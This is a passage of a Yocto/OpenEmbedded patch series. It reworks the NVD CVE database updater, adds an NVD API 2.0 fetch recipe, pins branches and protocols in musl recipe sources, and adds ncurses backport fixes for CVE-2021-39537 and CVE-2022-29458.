+CVE_SOCKET_TIMEOUT ?= "60"
+NVDCVE_URL ?= "https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-"
+
+CVE_DB_TEMP_FILE ?= "${CVE_CHECK_DB_DIR}/temp_nvdcve_1.1.db"
+
python () {
if not bb.data.inherits_class("cve-check", d):
raise bb.parse.SkipRecipe("Skip recipe when cve-check class is not loaded.")
}
-python do_populate_cve_db() {
+python do_fetch() {
"""
Update NVD database with json data feed
"""
import bb.utils
import bb.progress
- import sqlite3, urllib, urllib.parse, shutil, gzip
- from datetime import date
+ import shutil
bb.utils.export_proxies(d)
- BASE_URL = "https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-"
- YEAR_START = 2002
-
db_file = d.getVar("CVE_CHECK_DB_FILE")
db_dir = os.path.dirname(db_file)
+ db_tmp_file = d.getVar("CVE_DB_TEMP_FILE")
+
+ cleanup_db_download(db_file, db_tmp_file)
+
+ # The NVD database changes once a day, so no need to update more frequently
+ # Allow the user to force-update
+ try:
+ import time
+ update_interval = int(d.getVar("CVE_DB_UPDATE_INTERVAL"))
+ if update_interval < 0:
+ bb.note("CVE database update skipped")
+ return
+ if time.time() - os.path.getmtime(db_file) < update_interval:
+ return
+ except OSError:
+ pass
+
+ bb.utils.mkdirhier(db_dir)
+ if os.path.exists(db_file):
+ shutil.copy2(db_file, db_tmp_file)
+
+ if update_db_file(db_tmp_file, d) == True:
+ # Update downloaded correctly, can swap files
+ shutil.move(db_tmp_file, db_file)
+ else:
+ # Update failed, do not modify the database
+ bb.note("CVE database update failed")
+ os.remove(db_tmp_file)
+}
+
+do_fetch[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}"
+do_fetch[file-checksums] = ""
+do_fetch[vardeps] = ""
+
+def cleanup_db_download(db_file, db_tmp_file):
+ """
+ Cleanup the download space from possible failed downloads
+ """
+
+ # Clean up the updates done on the main file
+ # Remove it only if a journal file exists - it means a complete re-download
if os.path.exists("{0}-journal".format(db_file)):
# If a journal is present the last update might have been interrupted. In that case,
# just wipe any leftovers and force the DB to be recreated.
@@ -42,37 +90,50 @@ python do_populate_cve_db() {
if os.path.exists(db_file):
os.remove(db_file)
- # Don't refresh the database more than once an hour
- try:
- import time
- if time.time() - os.path.getmtime(db_file) < (60*60):
- return
- except OSError:
- pass
+ # Clean-up the temporary file downloads, we can remove both journal
+ # and the temporary database
+ if os.path.exists("{0}-journal".format(db_tmp_file)):
+ # If a journal is present the last update might have been interrupted. In that case,
+ # just wipe any leftovers and force the DB to be recreated.
+ os.remove("{0}-journal".format(db_tmp_file))
- bb.utils.mkdirhier(db_dir)
+ if os.path.exists(db_tmp_file):
+ os.remove(db_tmp_file)
- # Connect to database
- conn = sqlite3.connect(db_file)
- c = conn.cursor()
+def update_db_file(db_tmp_file, d):
+ """
+ Update the given database file
+ """
+ import bb.utils, bb.progress
+ from datetime import date
+ import urllib, gzip, sqlite3
+
+ YEAR_START = 2002
+ cve_socket_timeout = int(d.getVar("CVE_SOCKET_TIMEOUT"))
- initialize_db(c)
+ # Connect to database
+ conn = sqlite3.connect(db_tmp_file)
+ initialize_db(conn)
with bb.progress.ProgressHandler(d) as ph, open(os.path.join(d.getVar("TMPDIR"), 'cve_check'), 'a') as cve_f:
total_years = date.today().year + 1 - YEAR_START
for i, year in enumerate(range(YEAR_START, date.today().year + 1)):
+ bb.debug(2, "Updating %d" % year)
ph.update((float(i + 1) / total_years) * 100)
- year_url = BASE_URL + str(year)
+ year_url = (d.getVar('NVDCVE_URL')) + str(year)
meta_url = year_url + ".meta"
json_url = year_url + ".json.gz"
# Retrieve meta last modified date
try:
- response = urllib.request.urlopen(meta_url)
+ response = urllib.request.urlopen(meta_url, timeout=cve_socket_timeout)
except urllib.error.URLError as e:
cve_f.write('Warning: CVE db update error, Unable to fetch CVE data.\n\n')
- bb.warn("Failed to fetch CVE data (%s)" % e.reason)
- return
+ bb.warn("Failed to fetch CVE data (%s)" % e)
+ import socket
+ result = socket.getaddrinfo("nvd.nist.gov", 443, proto=socket.IPPROTO_TCP)
+ bb.warn("Host IPs are %s" % (", ".join(t[4][0] for t in result)))
+ return False
if response:
for l in response.read().decode("utf-8").splitlines():
@@ -82,64 +143,81 @@ python do_populate_cve_db() {
break
else:
bb.warn("Cannot parse CVE metadata, update failed")
- return
+ return False
# Compare with current db last modified date
- c.execute("select DATE from META where YEAR = ?", (year,))
- meta = c.fetchone()
+ cursor = conn.execute("select DATE from META where YEAR = ?", (year,))
+ meta = cursor.fetchone()
+ cursor.close()
+
if not meta or meta[0] != last_modified:
+ bb.debug(2, "Updating entries")
# Clear products table entries corresponding to current year
- c.execute("delete from PRODUCTS where ID like ?", ('CVE-%d%%' % year,))
+ conn.execute("delete from PRODUCTS where ID like ?", ('CVE-%d%%' % year,)).close()
# Update db with current year json file
try:
- response = urllib.request.urlopen(json_url)
+ response = urllib.request.urlopen(json_url, timeout=cve_socket_timeout)
if response:
- update_db(c, gzip.decompress(response.read()).decode('utf-8'))
- c.execute("insert or replace into META values (?, ?)", [year, last_modified])
+ update_db(conn, gzip.decompress(response.read()).decode('utf-8'))
+ conn.execute("insert or replace into META values (?, ?)", [year, last_modified]).close()
except urllib.error.URLError as e:
cve_f.write('Warning: CVE db update error, CVE data is outdated.\n\n')
bb.warn("Cannot parse CVE data (%s), update failed" % e.reason)
- return
-
+ return False
+ else:
+ bb.debug(2, "Already up to date (last modified %s)" % last_modified)
# Update success, set the date to cve_check file.
if year == date.today().year:
cve_f.write('CVE database update : %s\n\n' % date.today())
conn.commit()
conn.close()
-}
+ return True
-do_populate_cve_db[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}"
+def initialize_db(conn):
+ with conn:
+ c = conn.cursor()
-def initialize_db(c):
- c.execute("CREATE TABLE IF NOT EXISTS META (YEAR INTEGER UNIQUE, DATE TEXT)")
+ c.execute("CREATE TABLE IF NOT EXISTS META (YEAR INTEGER UNIQUE, DATE TEXT)")
- c.execute("CREATE TABLE IF NOT EXISTS NVD (ID TEXT UNIQUE, SUMMARY TEXT, \
- SCOREV2 TEXT, SCOREV3 TEXT, MODIFIED INTEGER, VECTOR TEXT)")
+ c.execute("CREATE TABLE IF NOT EXISTS NVD (ID TEXT UNIQUE, SUMMARY TEXT, \
+ SCOREV2 TEXT, SCOREV3 TEXT, MODIFIED INTEGER, VECTOR TEXT)")
- c.execute("CREATE TABLE IF NOT EXISTS PRODUCTS (ID TEXT, \
- VENDOR TEXT, PRODUCT TEXT, VERSION_START TEXT, OPERATOR_START TEXT, \
- VERSION_END TEXT, OPERATOR_END TEXT)")
- c.execute("CREATE INDEX IF NOT EXISTS PRODUCT_ID_IDX on PRODUCTS(ID);")
+ c.execute("CREATE TABLE IF NOT EXISTS PRODUCTS (ID TEXT, \
+ VENDOR TEXT, PRODUCT TEXT, VERSION_START TEXT, OPERATOR_START TEXT, \
+ VERSION_END TEXT, OPERATOR_END TEXT)")
+ c.execute("CREATE INDEX IF NOT EXISTS PRODUCT_ID_IDX on PRODUCTS(ID);")
-def parse_node_and_insert(c, node, cveId):
+ c.close()
+
+def parse_node_and_insert(conn, node, cveId):
# Parse children node if needed
for child in node.get('children', ()):
- parse_node_and_insert(c, child, cveId)
+ parse_node_and_insert(conn, child, cveId)
def cpe_generator():
for cpe in node.get('cpe_match', ()):
if not cpe['vulnerable']:
return
- cpe23 = cpe['cpe23Uri'].split(':')
+ cpe23 = cpe.get('cpe23Uri')
+ if not cpe23:
+ return
+ cpe23 = cpe23.split(':')
+ if len(cpe23) < 6:
+ return
vendor = cpe23[3]
product = cpe23[4]
version = cpe23[5]
+ if cpe23[6] == '*' or cpe23[6] == '-':
+ version_suffix = ""
+ else:
+ version_suffix = "_" + cpe23[6]
+
if version != '*' and version != '-':
# Version is defined, this is a '=' match
- yield [cveId, vendor, product, version, '=', '', '']
+ yield [cveId, vendor, product, version + version_suffix, '=', '', '']
elif version == '-':
# no version information is available
yield [cveId, vendor, product, version, '', '', '']
@@ -166,11 +244,16 @@ def parse_node_and_insert(c, node, cveId):
op_end = '<'
v_end = cpe['versionEndExcluding']
- yield [cveId, vendor, product, v_start, op_start, v_end, op_end]
+ if op_start or op_end or v_start or v_end:
+ yield [cveId, vendor, product, v_start, op_start, v_end, op_end]
+ else:
+ # This is no version information, expressed differently.
+ # Save processing by representing as -.
+ yield [cveId, vendor, product, '-', '', '', '']
- c.executemany("insert into PRODUCTS values (?, ?, ?, ?, ?, ?, ?)", cpe_generator())
+ conn.executemany("insert into PRODUCTS values (?, ?, ?, ?, ?, ?, ?)", cpe_generator()).close()
-def update_db(c, jsondata):
+def update_db(conn, jsondata):
import json
root = json.loads(jsondata)
@@ -194,15 +277,14 @@ def update_db(c, jsondata):
accessVector = accessVector or "UNKNOWN"
cvssv3 = 0.0
- c.execute("insert or replace into NVD values (?, ?, ?, ?, ?, ?)",
- [cveId, cveDesc, cvssv2, cvssv3, date, accessVector])
+ conn.execute("insert or replace into NVD values (?, ?, ?, ?, ?, ?)",
+ [cveId, cveDesc, cvssv2, cvssv3, date, accessVector]).close()
configurations = elt['configurations']['nodes']
for config in configurations:
- parse_node_and_insert(c, config, cveId)
+ parse_node_and_insert(conn, config, cveId)
-addtask do_populate_cve_db before do_fetch
-do_populate_cve_db[nostamp] = "1"
+do_fetch[nostamp] = "1"
EXCLUDE_FROM_WORLD = "1"
diff --git a/meta/recipes-core/meta/cve-update-nvd2-native.bb b/meta/recipes-core/meta/cve-update-nvd2-native.bb
new file mode 100644
index 0000000000..1a3eeba6d0
--- /dev/null
+++ b/meta/recipes-core/meta/cve-update-nvd2-native.bb
@@ -0,0 +1,372 @@
+SUMMARY = "Updates the NVD CVE database"
+LICENSE = "MIT"
+
+# Important note:
+# This product uses the NVD API but is not endorsed or certified by the NVD.
+
+INHIBIT_DEFAULT_DEPS = "1"
+
+inherit native
+
+deltask do_unpack
+deltask do_patch
+deltask do_configure
+deltask do_compile
+deltask do_install
+deltask do_populate_sysroot
+
+NVDCVE_URL ?= "https://services.nvd.nist.gov/rest/json/cves/2.0"
+
+# If you have a NVD API key (https://nvd.nist.gov/developers/request-an-api-key)
+# then setting this to get higher rate limits.
+NVDCVE_API_KEY ?= ""
+
+# CVE database update interval, in seconds. By default: once a day (24*60*60).
+# Use 0 to force the update
+# Use a negative value to skip the update
+CVE_DB_UPDATE_INTERVAL ?= "86400"
+
+# CVE database incremental update age threshold, in seconds. If the database is
+# older than this threshold, do a full re-download, else, do an incremental
+# update. By default: the maximum allowed value from NVD: 120 days (120*24*60*60)
+# Use 0 to force a full download.
+CVE_DB_INCR_UPDATE_AGE_THRES ?= "10368000"
+
+# Number of attempts for each http query to nvd server before giving up
+CVE_DB_UPDATE_ATTEMPTS ?= "5"
+
+CVE_DB_TEMP_FILE ?= "${CVE_CHECK_DB_DIR}/temp_nvdcve_2.db"
+
+python () {
+ if not bb.data.inherits_class("cve-check", d):
+ raise bb.parse.SkipRecipe("Skip recipe when cve-check class is not loaded.")
+}
+
+python do_fetch() {
+ """
+ Update NVD database with API 2.0
+ """
+ import bb.utils
+ import bb.progress
+ import shutil
+
+ bb.utils.export_proxies(d)
+
+ db_file = d.getVar("CVE_CHECK_DB_FILE")
+ db_dir = os.path.dirname(db_file)
+ db_tmp_file = d.getVar("CVE_DB_TEMP_FILE")
+
+ cleanup_db_download(db_file, db_tmp_file)
+ # By default let's update the whole database (since time 0)
+ database_time = 0
+
+ # The NVD database changes once a day, so no need to update more frequently
+ # Allow the user to force-update
+ try:
+ import time
+ update_interval = int(d.getVar("CVE_DB_UPDATE_INTERVAL"))
+ if update_interval < 0:
+ bb.note("CVE database update skipped")
+ return
+ if time.time() - os.path.getmtime(db_file) < update_interval:
+ bb.note("CVE database recently updated, skipping")
+ return
+ database_time = os.path.getmtime(db_file)
+
+ except OSError:
+ pass
+
+ bb.utils.mkdirhier(db_dir)
+ if os.path.exists(db_file):
+ shutil.copy2(db_file, db_tmp_file)
+
+ if update_db_file(db_tmp_file, d, database_time) == True:
+ # Update downloaded correctly, can swap files
+ shutil.move(db_tmp_file, db_file)
+ else:
+ # Update failed, do not modify the database
+ bb.warn("CVE database update failed")
+ os.remove(db_tmp_file)
+}
+
+do_fetch[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}"
+do_fetch[file-checksums] = ""
+do_fetch[vardeps] = ""
+
+def cleanup_db_download(db_file, db_tmp_file):
+ """
+ Cleanup the download space from possible failed downloads
+ """
+
+ # Clean up the updates done on the main file
+ # Remove it only if a journal file exists - it means a complete re-download
+ if os.path.exists("{0}-journal".format(db_file)):
+ # If a journal is present the last update might have been interrupted. In that case,
+ # just wipe any leftovers and force the DB to be recreated.
+ os.remove("{0}-journal".format(db_file))
+
+ if os.path.exists(db_file):
+ os.remove(db_file)
+
+ # Clean-up the temporary file downloads, we can remove both journal
+ # and the temporary database
+ if os.path.exists("{0}-journal".format(db_tmp_file)):
+ # If a journal is present the last update might have been interrupted. In that case,
+ # just wipe any leftovers and force the DB to be recreated.
+ os.remove("{0}-journal".format(db_tmp_file))
+
+ if os.path.exists(db_tmp_file):
+ os.remove(db_tmp_file)
+
+def nvd_request_wait(attempt, min_wait):
+ return min ( ( (2 * attempt) + min_wait ) , 30)
+
+def nvd_request_next(url, attempts, api_key, args, min_wait):
+ """
+ Request next part of the NVD database
+ NVD API documentation: https://nvd.nist.gov/developers/vulnerabilities
+ """
+
+ import urllib.request
+ import urllib.parse
+ import gzip
+ import http
+ import time
+
+ request = urllib.request.Request(url + "?" + urllib.parse.urlencode(args))
+ if api_key:
+ request.add_header("apiKey", api_key)
+ bb.note("Requesting %s" % request.full_url)
+
+ for attempt in range(attempts):
+ try:
+ r = urllib.request.urlopen(request)
+
+ if (r.headers['content-encoding'] == 'gzip'):
+ buf = r.read()
+ raw_data = gzip.decompress(buf).decode("utf-8")
+ else:
+ raw_data = r.read().decode("utf-8")
+
+ r.close()
+
+ except Exception as e:
+ wait_time = nvd_request_wait(attempt, min_wait)
+ bb.note("CVE database: received error (%s)" % (e))
+ bb.note("CVE database: retrying download after %d seconds. attempted (%d/%d)" % (wait_time, attempt+1, attempts))
+ time.sleep(wait_time)
+ pass
+ else:
+ return raw_data
+ else:
+ # We failed at all attempts
+ return None
+
+def update_db_file(db_tmp_file, d, database_time):
+ """
+ Update the given database file
+ """
+ import bb.utils, bb.progress
+ import datetime
+ import sqlite3
+ import json
+
+ # Connect to database
+ conn = sqlite3.connect(db_tmp_file)
+ initialize_db(conn)
+
+ req_args = {'startIndex' : 0}
+
+ incr_update_threshold = int(d.getVar("CVE_DB_INCR_UPDATE_AGE_THRES"))
+ if database_time != 0:
+ database_date = datetime.datetime.fromtimestamp(database_time, tz=datetime.timezone.utc)
+ today_date = datetime.datetime.now(tz=datetime.timezone.utc)
+ delta = today_date - database_date
+ if incr_update_threshold == 0:
+ bb.note("CVE database: forced full update")
+ elif delta < datetime.timedelta(seconds=incr_update_threshold):
+ bb.note("CVE database: performing partial update")
+ # The maximum range for time is 120 days
+ if delta > datetime.timedelta(days=120):
+ bb.error("CVE database: Trying to do an incremental update on a larger than supported range")
+ req_args['lastModStartDate'] = database_date.isoformat()
+ req_args['lastModEndDate'] = today_date.isoformat()
+ else:
+ bb.note("CVE database: file too old, forcing a full update")
+ else:
+ bb.note("CVE database: no preexisting database, do a full download")
+
+ with bb.progress.ProgressHandler(d) as ph, open(os.path.join(d.getVar("TMPDIR"), 'cve_check'), 'a') as cve_f:
+
+ bb.note("Updating entries")
+ index = 0
+ url = d.getVar("NVDCVE_URL")
+ api_key = d.getVar("NVDCVE_API_KEY") or None
+ attempts = int(d.getVar("CVE_DB_UPDATE_ATTEMPTS"))
+
+ # Recommended by NVD
+ wait_time = 6
+ if api_key:
+ wait_time = 2
+
+ while True:
+ req_args['startIndex'] = index
+ raw_data = nvd_request_next(url, attempts, api_key, req_args, wait_time)
+ if raw_data is None:
+ # We haven't managed to download data
+ return False
+
+ data = json.loads(raw_data)
+
+ index = data["startIndex"]
+ total = data["totalResults"]
+ per_page = data["resultsPerPage"]
+ bb.note("Got %d entries" % per_page)
+ for cve in data["vulnerabilities"]:
+ update_db(conn, cve)
+
+ index += per_page
+ ph.update((float(index) / (total+1)) * 100)
+ if index >= total:
+ break
+
+ # Recommended by NVD
+ time.sleep(wait_time)
+
+ # Update success, set the date to cve_check file.
+ cve_f.write('CVE database update : %s\n\n' % datetime.date.today())
+
+ conn.commit()
+ conn.close()
+ return True
+
+def initialize_db(conn):
+ with conn:
+ c = conn.cursor()
+
+ c.execute("CREATE TABLE IF NOT EXISTS META (YEAR INTEGER UNIQUE, DATE TEXT)")
+
+ c.execute("CREATE TABLE IF NOT EXISTS NVD (ID TEXT UNIQUE, SUMMARY TEXT, \
+ SCOREV2 TEXT, SCOREV3 TEXT, MODIFIED INTEGER, VECTOR TEXT)")
+
+ c.execute("CREATE TABLE IF NOT EXISTS PRODUCTS (ID TEXT, \
+ VENDOR TEXT, PRODUCT TEXT, VERSION_START TEXT, OPERATOR_START TEXT, \
+ VERSION_END TEXT, OPERATOR_END TEXT)")
+ c.execute("CREATE INDEX IF NOT EXISTS PRODUCT_ID_IDX on PRODUCTS(ID);")
+
+ c.close()
+
+def parse_node_and_insert(conn, node, cveId):
+
+ def cpe_generator():
+ for cpe in node.get('cpeMatch', ()):
+ if not cpe['vulnerable']:
+ return
+ cpe23 = cpe.get('criteria')
+ if not cpe23:
+ return
+ cpe23 = cpe23.split(':')
+ if len(cpe23) < 6:
+ return
+ vendor = cpe23[3]
+ product = cpe23[4]
+ version = cpe23[5]
+
+ if cpe23[6] == '*' or cpe23[6] == '-':
+ version_suffix = ""
+ else:
+ version_suffix = "_" + cpe23[6]
+
+ if version != '*' and version != '-':
+ # Version is defined, this is a '=' match
+ yield [cveId, vendor, product, version + version_suffix, '=', '', '']
+ elif version == '-':
+ # no version information is available
+ yield [cveId, vendor, product, version, '', '', '']
+ else:
+ # Parse start version, end version and operators
+ op_start = ''
+ op_end = ''
+ v_start = ''
+ v_end = ''
+
+ if 'versionStartIncluding' in cpe:
+ op_start = '>='
+ v_start = cpe['versionStartIncluding']
+
+ if 'versionStartExcluding' in cpe:
+ op_start = '>'
+ v_start = cpe['versionStartExcluding']
+
+ if 'versionEndIncluding' in cpe:
+ op_end = '<='
+ v_end = cpe['versionEndIncluding']
+
+ if 'versionEndExcluding' in cpe:
+ op_end = '<'
+ v_end = cpe['versionEndExcluding']
+
+ if op_start or op_end or v_start or v_end:
+ yield [cveId, vendor, product, v_start, op_start, v_end, op_end]
+ else:
+ # This is no version information, expressed differently.
+ # Save processing by representing as -.
+ yield [cveId, vendor, product, '-', '', '', '']
+
+ conn.executemany("insert into PRODUCTS values (?, ?, ?, ?, ?, ?, ?)", cpe_generator()).close()
+
+def update_db(conn, elt):
+ """
+ Update a single entry in the on-disk database
+ """
+
+ accessVector = None
+ cveId = elt['cve']['id']
+ if elt['cve']['vulnStatus'] == "Rejected":
+ c = conn.cursor()
+ c.execute("delete from PRODUCTS where ID = ?;", [cveId])
+ c.execute("delete from NVD where ID = ?;", [cveId])
+ c.close()
+ return
+ cveDesc = ""
+ for desc in elt['cve']['descriptions']:
+ if desc['lang'] == 'en':
+ cveDesc = desc['value']
+ date = elt['cve']['lastModified']
+ try:
+ accessVector = elt['cve']['metrics']['cvssMetricV2'][0]['cvssData']['accessVector']
+ cvssv2 = elt['cve']['metrics']['cvssMetricV2'][0]['cvssData']['baseScore']
+ except KeyError:
+ cvssv2 = 0.0
+ cvssv3 = None
+ try:
+ accessVector = accessVector or elt['cve']['metrics']['cvssMetricV30'][0]['cvssData']['attackVector']
+ cvssv3 = elt['cve']['metrics']['cvssMetricV30'][0]['cvssData']['baseScore']
+ except KeyError:
+ pass
+ try:
+ accessVector = accessVector or elt['cve']['metrics']['cvssMetricV31'][0]['cvssData']['attackVector']
+ cvssv3 = cvssv3 or elt['cve']['metrics']['cvssMetricV31'][0]['cvssData']['baseScore']
+ except KeyError:
+ pass
+ accessVector = accessVector or "UNKNOWN"
+ cvssv3 = cvssv3 or 0.0
+
+ conn.execute("insert or replace into NVD values (?, ?, ?, ?, ?, ?)",
+ [cveId, cveDesc, cvssv2, cvssv3, date, accessVector]).close()
+
+ try:
+ # Remove any pre-existing CVE configuration. Even for partial database
+ # update, those will be repopulated. This ensures that old
+ # configuration is not kept for an updated CVE.
+ conn.execute("delete from PRODUCTS where ID = ?", [cveId]).close()
+ for config in elt['cve']['configurations']:
+ # This is suboptimal as it doesn't handle AND/OR and negate, but is better than nothing
+ for node in config["nodes"]:
+ parse_node_and_insert(conn, node, cveId)
+ except KeyError:
+ bb.note("CVE %s has no configurations" % cveId)
+
+do_fetch[nostamp] = "1"
+
+EXCLUDE_FROM_WORLD = "1"
diff --git a/meta/recipes-core/musl/libucontext_git.bb b/meta/recipes-core/musl/libucontext_git.bb
index ec988f1920..71beb80083 100644
--- a/meta/recipes-core/musl/libucontext_git.bb
+++ b/meta/recipes-core/musl/libucontext_git.bb
@@ -10,7 +10,7 @@ DEPENDS = ""
PV = "0.10+${SRCPV}"
SRCREV = "19fa1bbfc26efb92147b5e85cc0ca02a0e837561"
-SRC_URI = "git://github.com/kaniini/libucontext \
+SRC_URI = "git://github.com/kaniini/libucontext;branch=master;protocol=https \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-core/musl/musl-obstack.bb b/meta/recipes-core/musl/musl-obstack.bb
index 3003935fe5..74de48c2cd 100644
--- a/meta/recipes-core/musl/musl-obstack.bb
+++ b/meta/recipes-core/musl/musl-obstack.bb
@@ -10,7 +10,7 @@ SECTION = "libs"
PV = "1.1"
SRCREV = "d2ad66b0df44a4b784956f7f7f2717131ddc05f4"
-SRC_URI = "git://github.com/pullmoll/musl-obstack"
+SRC_URI = "git://github.com/pullmoll/musl-obstack;branch=master;protocol=https"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-core/musl/musl-utils.bb b/meta/recipes-core/musl/musl-utils.bb
index dd0ce33061..c30509469c 100644
--- a/meta/recipes-core/musl/musl-utils.bb
+++ b/meta/recipes-core/musl/musl-utils.bb
@@ -11,7 +11,7 @@ SECTION = "utils"
PV = "20170421"
SRCREV = "fb5630138ccabbbc14a19d372096a04e42573c7d"
-SRC_URI = "git://github.com/boltlinux/musl-utils"
+SRC_URI = "git://github.com/boltlinux/musl-utils;branch=master;protocol=https"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-core/musl/musl_git.bb b/meta/recipes-core/musl/musl_git.bb
index 82379fd1c5..cbb56f4769 100644
--- a/meta/recipes-core/musl/musl_git.bb
+++ b/meta/recipes-core/musl/musl_git.bb
@@ -12,7 +12,7 @@ PV = "${BASEVER}+git${SRCPV}"
# mirror is at git://github.com/kraj/musl.git
-SRC_URI = "git://git.musl-libc.org/musl \
+SRC_URI = "git://git.musl-libc.org/musl;branch=master \
file://0001-Make-dynamic-linker-a-relative-symlink-to-libc.patch \
file://0002-ldso-Use-syslibdir-and-libdir-as-default-pathes-to-l.patch \
"
diff --git a/meta/recipes-core/ncurses/files/0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch b/meta/recipes-core/ncurses/files/0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch
new file mode 100644
index 0000000000..1eb17767a0
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch
@@ -0,0 +1,29 @@
+From 3b3e87934bb6d8511261d7c3d6e39b4f71849272 Mon Sep 17 00:00:00 2001
+From: Nathan Rossi <nathan@nathanrossi.com>
+Date: Mon, 14 Dec 2020 13:39:02 +1000
+Subject: [PATCH] gen-pkgconfig.in: Do not include LDFLAGS in generated pc
+ files
+
+Including the LDFLAGS in the pkgconfig output is problematic as OE
+includes build host specific paths and options (e.g. uninative and
+'-Wl,--dynamic-linker=').
+
+Upstream-Status: Inappropriate [OE Specific]
+Signed-off-by: Nathan Rossi <nathan@nathanrossi.com>
+---
+ misc/gen-pkgconfig.in | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/misc/gen-pkgconfig.in b/misc/gen-pkgconfig.in
+index 8f00b824b9..009d215663 100644
+--- a/misc/gen-pkgconfig.in
++++ b/misc/gen-pkgconfig.in
+@@ -80,7 +80,7 @@ if [ "$includedir" != "/usr/include" ]; then
+ fi
+
+ lib_flags=
+-for opt in -L$libdir @LDFLAGS@ @EXTRA_LDFLAGS@ @LIBS@
++for opt in -L$libdir @LIBS@
+ do
+ case $opt in
+ -l*) # LIBS is handled specially below
diff --git a/meta/recipes-core/ncurses/files/CVE-2021-39537.patch b/meta/recipes-core/ncurses/files/CVE-2021-39537.patch
new file mode 100644
index 0000000000..7655200350
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2021-39537.patch
@@ -0,0 +1,30 @@
+$NetBSD: patch-ncurses_tinfo_captoinfo.c,v 1.1 2021/10/09 07:52:36 wiz Exp $
+
+Fix for CVE-2021-39537 from upstream:
+https://github.com/ThomasDickey/ncurses-snapshots/commit/63ca9e061f4644795d6f3f559557f3e1ed8c738b#diff-7e95c7bc5f213e9be438e69a9d5d0f261a14952bcbd692f7b9014217b8047340
+
+CVE: CVE-2021-39537
+Upstream-Status: Backport [http://cvsweb.netbsd.org/bsdweb.cgi/pkgsrc/devel/ncurses/patches/Attic/patch-ncurses_tinfo_captoinfo.c?rev=1.1&content-type=text/x-cvsweb-markup]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/ncurses/tinfo/captoinfo.c 2020-02-02 23:34:34.000000000 +0000
++++ b/ncurses/tinfo/captoinfo.c
+@@ -216,12 +216,15 @@ cvtchar(register const char *sp)
+ }
+ break;
+ case '^':
++ len = 2;
+ c = UChar(*++sp);
+- if (c == '?')
++ if (c == '?') {
+ c = 127;
+- else
++ } else if (c == '\0') {
++ len = 1;
++ } else {
+ c &= 0x1f;
+- len = 2;
++ }
+ break;
+ default:
+ c = UChar(*sp);
diff --git a/meta/recipes-core/ncurses/files/CVE-2022-29458.patch b/meta/recipes-core/ncurses/files/CVE-2022-29458.patch
new file mode 100644
index 0000000000..eb1b7c96f9
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2022-29458.patch
@@ -0,0 +1,135 @@
+From 5f40697e37e195069f55528fc7a1d77e619ad104 Mon Sep 17 00:00:00 2001
+From: Dan Tran <dantran@microsoft.com>
+Date: Fri, 13 May 2022 13:28:41 -0700
+Subject: [PATCH] ncurses 6.3 before patch 20220416 has an out-of-bounds read
+ and segmentation violation in convert_strings in tinfo/read_entry.c in the
+ terminfo library.
+
+CVE: CVE-2022-29458
+Upstream-Status: Backport
+[https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1009870]
+
+Signed-off-by: Gustavo Lima Chaves <gustavo.chaves@microsoft.com>
+Signed-off-by: Dan Tran <dantran@microsoft.com>
+---
+ ncurses/tinfo/alloc_entry.c | 14 ++++++--------
+ ncurses/tinfo/read_entry.c | 25 +++++++++++++++++++------
+ 2 files changed, 25 insertions(+), 14 deletions(-)
+
+diff --git a/ncurses/tinfo/alloc_entry.c b/ncurses/tinfo/alloc_entry.c
+index 4bf7d6c8..b49ad6aa 100644
+--- a/ncurses/tinfo/alloc_entry.c
++++ b/ncurses/tinfo/alloc_entry.c
+@@ -48,13 +48,11 @@
+
+ #include <tic.h>
+
+-MODULE_ID("$Id: alloc_entry.c,v 1.64 2020/02/02 23:34:34 tom Exp $")
++MODULE_ID("$Id: alloc_entry.c,v 1.69 2022/04/16 22:46:53 tom Exp $")
+
+ #define ABSENT_OFFSET -1
+ #define CANCELLED_OFFSET -2
+
+-#define MAX_STRTAB 4096 /* documented maximum entry size */
+-
+ static char *stringbuf; /* buffer for string capabilities */
+ static size_t next_free; /* next free character in stringbuf */
+
+@@ -71,8 +69,8 @@ _nc_init_entry(ENTRY * const tp)
+ }
+ #endif
+
+- if (stringbuf == 0)
+- TYPE_MALLOC(char, (size_t) MAX_STRTAB, stringbuf);
++ if (stringbuf == NULL)
++ TYPE_MALLOC(char, (size_t) MAX_ENTRY_SIZE, stringbuf);
+
+ next_free = 0;
+
+@@ -108,11 +106,11 @@ _nc_save_str(const char *const string)
+ * Cheat a little by making an empty string point to the end of the
+ * previous string.
+ */
+- if (next_free < MAX_STRTAB) {
++ if (next_free < MAX_ENTRY_SIZE) {
+ result = (stringbuf + next_free - 1);
+ }
+- } else if (next_free + len < MAX_STRTAB) {
+- _nc_STRCPY(&stringbuf[next_free], string, MAX_STRTAB);
++ } else if (next_free + len < MAX_ENTRY_SIZE) {
++ _nc_STRCPY(&stringbuf[next_free], string, MAX_ENTRY_SIZE);
+ DEBUG(7, ("Saved string %s", _nc_visbuf(string)));
+ DEBUG(7, ("at location %d", (int) next_free));
+ next_free += len;
+diff --git a/ncurses/tinfo/read_entry.c b/ncurses/tinfo/read_entry.c
+index 5b570b0f..23c2cebc 100644
+--- a/ncurses/tinfo/read_entry.c
++++ b/ncurses/tinfo/read_entry.c
+@@ -1,5 +1,5 @@
+ /****************************************************************************
+- * Copyright 2018-2019,2020 Thomas E. Dickey *
++ * Copyright 2018-2021,2022 Thomas E. Dickey *
+ * Copyright 1998-2016,2017 Free Software Foundation, Inc. *
+ * *
+ * Permission is hereby granted, free of charge, to any person obtaining a *
+@@ -42,7 +42,7 @@
+
+ #include <tic.h>
+
+-MODULE_ID("$Id: read_entry.c,v 1.157 2020/02/02 23:34:34 tom Exp $")
++MODULE_ID("$Id: read_entry.c,v 1.162 2022/04/16 21:00:00 tom Exp $")
+
